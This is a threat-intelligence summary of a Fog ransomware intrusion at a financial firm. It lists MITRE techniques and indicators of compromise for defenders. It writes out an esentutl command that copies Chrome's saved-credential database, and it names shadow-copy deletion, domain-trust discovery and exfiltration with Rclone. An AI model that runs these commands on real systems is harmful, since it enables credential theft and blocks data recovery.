Fog Ransomware has shifted its targets to the financial services sector, employing compromised VPN credentials and privilege escalation to encrypt critical files. Adlumin successfully contained the August 2024 attack by isolating affected machines and preventing data theft using decoy files and real-time monitoring.
#FogRansomware #LostInTheFog #STOPDJVU #Adlumin #FinancialServices
#FogRansomware #LostInTheFog #STOPDJVU #Adlumin #FinancialServices
Keypoints
- The Fog Ransomware group is now targeting the financial services sector.
- Adlumin’s technology isolated affected machines during the August 2024 attack, preventing significant encryption or data theft.
- Fog exploits compromised VPN credentials and targets sensitive data on Windows and Linux systems.
- The ransomware uses advanced techniques like pass-the-hash for privilege escalation.
- Indicators of compromise include IP addresses originating in Russia, though attribution remains uncertain.
- Recommendations include MFA, regular updates, endpoint isolation, and a comprehensive security platform.
MITRE Techniques
- [T1003] Credential Dumping – Brief description: Used esentutl.exe to back up login data, including encrypted credentials from Google Chrome. ‘cmd.exe /Q /c esentutl.exe /y “C:Users”USERNAME”AppDataLocalGoogleChromeUser DataDefaultLogin Data” /d “C:Users”USERNAME”AppDataLocalGoogleChromeUser DataDefaultLogin Data.tmp”’
- [T1021] Lateral Movement – Brief description: Used two compromised service accounts to move laterally; nltest /domain_trusts was executed to leverage domain trust relationships. ‘
- [T1105] Remote File Copy – Brief description: Used Rclone to sync and transfer data from compromised endpoints, targeting files modified within the last two years while excluding certain file types.
- [T1486] Data Encrypted for Impact – Brief description: Deployed locker.exe to encrypt files on the network; files marked with .FOG or .FLOCKED extensions and a ransom note left on endpoints.
- [T1016] Network Discovery – Brief description: Sent pings to other endpoints; outputs stored in pings.txt and pingw.txt; used Advanced_Port_Scanner_2.5.3869(1).exe for reconnaissance.
- [T1047] Windows Management Instrumentation – Brief description: Used WMIC commands to delete system shadow copies to hinder recovery.
Indicators of Compromise
- [IP Address] Russia-origin IPs – Russia-based IP addresses observed during intrusion
- [File] locker.exe – Used to encrypt or “lock” files on the network
- [File] SharpShares.exe – Mapped network drives to enable lateral movement
- [File] readme.txt – Ransom note placed on infected endpoints
- [File] pings.txt, pingw.txt – Outputs of network discovery stored for reconnaissance
- [File] Advanced_Port_Scanner_2.5.3869(1).exe – Network scanning tool used for discovery
- [Tool] Rclone – Used to sync and transfer data from compromised endpoints
- [File Extension] .FOG, .FLOCKED – Extensions assigned to encrypted files
- [File] esentutl.exe – Used to back up login data, including credentials from Chrome
- [Command] nltest /domain_trusts – Used to leverage domain trust relationships
- [Tool] WMIC – Used to delete system shadow copies
Read more: https://adlumin.com/post/fog-ransomware-now-targeting-the-financial-sector/